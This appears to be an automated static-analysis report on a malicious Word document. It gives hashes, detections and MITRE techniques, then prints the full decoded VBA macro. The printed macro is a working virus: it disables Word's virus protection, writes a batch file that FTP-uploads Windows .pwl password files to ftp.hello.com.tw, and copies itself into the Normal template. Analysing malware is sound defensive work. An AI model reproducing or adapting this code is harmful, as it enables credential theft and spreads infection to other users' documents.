Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 63176ae1c1dbdea1…

MALICIOUS

Office (OLE)

27.0 KB Created: 2000-02-27 22:35:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 6a415d6d910f3a7c3abaa7285ae62cfa SHA-1: 63ce88da2c59f6e59338c0627e6ed979cf335681 SHA-256: 63176ae1c1dbdea1fb3b8238abca21c1b8e4a1bc8610446922a7e78e8e17ef41
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is a Microsoft Word document containing VBA macros. The macros utilize the Shell() function to execute a batch file located at 'c:\-.bat'. This batch file is designed to connect to 'ftp.hello.com.tw' via FTP and upload a file named '-', which appears to be a list of password files. This indicates an attempt to exfiltrate sensitive information or download a secondary payload.

Heuristics 3

  • ClamAV: Doc.Trojan.FS-9 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.FS-9
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1452 bytes
SHA-256: ed76e2a478cd3a22427fa4238f3b07047b51a656e607aff8cf7f1d43bada170b
Detection
ClamAV: Doc.Trojan.FS-9
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Lurcher
Private Declare Function RasEnumConnections Lib "RasApi32.DLL" Alias "RasEnumConnectionsA" (lprasconn As Any, lpcb As Long, lpcConnections As Long) As Long
Private Sub Document_Close()
On Error Resume Next
Options.VirusProtection = 1 - 1
Options.SaveNormalPrompt = 1 - 1
If RasEnumConnections(32, 0, 0) <> 0 Then
Open "c:\-.bat" For Output As #1
Print #1, "@echo off" & Chr(13) & Chr(10) & "ctty nul" & Chr(13) & Chr(10) & "echo virii>-" & Chr(13) & Chr(10) & "echo hieis>>-" & Chr(13) & Chr(10) & "echo binary>>-" & Chr(13) & Chr(10) & "for %%. in (%windir%\*.pwl) do echo put %%.>>-" & Chr(13) & Chr(10) & "echo bye>>-" & Chr(13) & Chr(10) & "ftp -s:- ftp.hello.com.tw" & Chr(13) & Chr(10) & "del -|del -.bat" & Chr(13) & Chr(10) & "ctty con" & Chr(13) & Chr(10)
Close #1: Shell "c:\-.bat", 0: End If
Set α = IIf(MacroContainer <> "Normal.dot", NormalTemplate, ActiveDocument)
With α.VBProject.VBComponents(1).CodeModule
If υ.Find("~^^~", 0, 0, 0, 0, 0, 0) = 0 Then _
.DeleteLines 1, .CountOfLines: _
.AddFromString ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 70)
End With: End Sub